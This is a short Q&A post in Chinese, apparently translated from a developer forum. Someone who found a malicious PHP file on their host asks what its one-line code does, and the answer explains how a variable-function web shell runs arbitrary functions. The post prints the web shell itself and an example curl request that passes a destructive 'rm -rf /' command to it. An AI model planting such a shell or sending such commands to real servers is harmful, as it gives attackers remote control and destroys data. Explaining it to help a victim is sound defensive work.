我在主机帐户上发现了带有以下代码的恶意php文件:
<?=$_GET[0]($_POST[1]);?>
请帮助我更好地理解此代码,此代码对上传者的可能性是什么?
提前谢谢。
$func = 'strlen';
$arg = 'foo';
echo $func($arg); // output: 3
您正在查看变量函数调用。在您的情况下,函数名称来自 URL 中的查询字符串和来自 HTTP POST 正文的参数。因此,这可以执行任何操作。可能有人会尝试使用它通过 exec 执行 shell 代码。
例如:
$ curl example.com/infected_file.php?exec -d 'rm%20-rf%20/'
(不是 100% 确定这会按原样完成,我不想尝试,但你明白了。